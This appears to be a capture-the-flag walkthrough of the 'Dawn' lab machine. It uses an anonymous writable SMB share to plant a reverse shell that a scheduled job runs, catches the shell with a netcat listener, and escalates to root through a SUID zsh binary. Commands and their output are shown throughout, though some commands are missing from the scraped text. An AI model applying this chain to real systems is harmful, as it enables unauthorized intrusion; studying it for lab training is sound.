Dawn
On port 445 we are able to list shares without credentials. We see the share ITDEPT is open to us.
kali@kali:~/dawn$ smbclient -U ” -L \\\\192.168.55.11\\
Enter WORKGROUP\’s password:
Sharename Type Comment
——— —- ——-
print$ Disk Printer Drivers
ITDEPT Disk PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
SMB1 disabled — no workgroup available
kali@kali:~/dawn$
kali@kali:~/dawn$ smbclient -U ” \\\\192.168.55.11\\ITDEPT
Enter WORKGROUP\’s password:
Try “help” to get a list of possible commands.
smb: \> ls
. D 0 Fri Aug 2 23:23:20 2019
.. D 0 Wed Jul 22 13:19:41 2020
7158264 blocks of size 1024. 3518364 blocks available
smb: \>
curl
to test for file upload on the share and confirmed was able to upload a PHP reverse shell which might come in handy for later.Enter host password for user ”:
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 5496 0 0 100 5496 0 536k –:–:– –:–:– –:–:– 596k
kali@kali:~/dawn$
dirsearch.py
on port 80 reveals two interesting directories.Moving into logs shows the a list of logs where management.log is the only one we have permission to access
When reading the log file we have the lines below appearing frequently.
Knowing that we have write access to the ITDEPT share we can upload a reverse shell call it web-control and in theory this should execute.
Firstly I created a file called web-control and inserted a netcat
reverse shell into it
This was then uploaded to the SMB share.
smb: \> put web-control putting file web-control as \web-control (81.0 kb/s) (average 30.2 kb/s) smb: \> ls . D 0 Thu Sep 2 09:34:20 2021 .. D 0 Wed Jul 22 13:19:41 2020 rev.php A 5496 Thu Sep 2 09:13:41 2021 web-control A 83 Thu Sep 2 09:38:54 2021 7158264 blocks of size 1024. 3518292 blocks available smb: \>
After doing so I soon receive a shell back on my netcat
listener.
kali@kali:~/dawn$ nc -nlvp 9001 listening on [any] 9001 ... connect to [192.168.55.200] from (UNKNOWN) [192.168.55.11] 34450 /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ python -c 'import pty; pty.spawn("/bin/bash")'
zsh
as having the SUID bit set.www-data@dawn:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/chfn
/home/dawn/ITDEPT
www-data@dawn:~$
zsh
is a shell binary all we need to do is execute the full path of zsh
to gain a root shell.www-data@dawn:~$ /usr/bin/zsh /usr/bin/zsh dawn# id id uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data) dawn# cd /root cd /root dawn# ls ls flag.txt proof.txt dawn# cat flag.txt cat flag.txt Your flag is in another file... dawn# cat proof.txt cat proof.txt 04bf91ebc2de37fbee66338c45a80b95 dawn#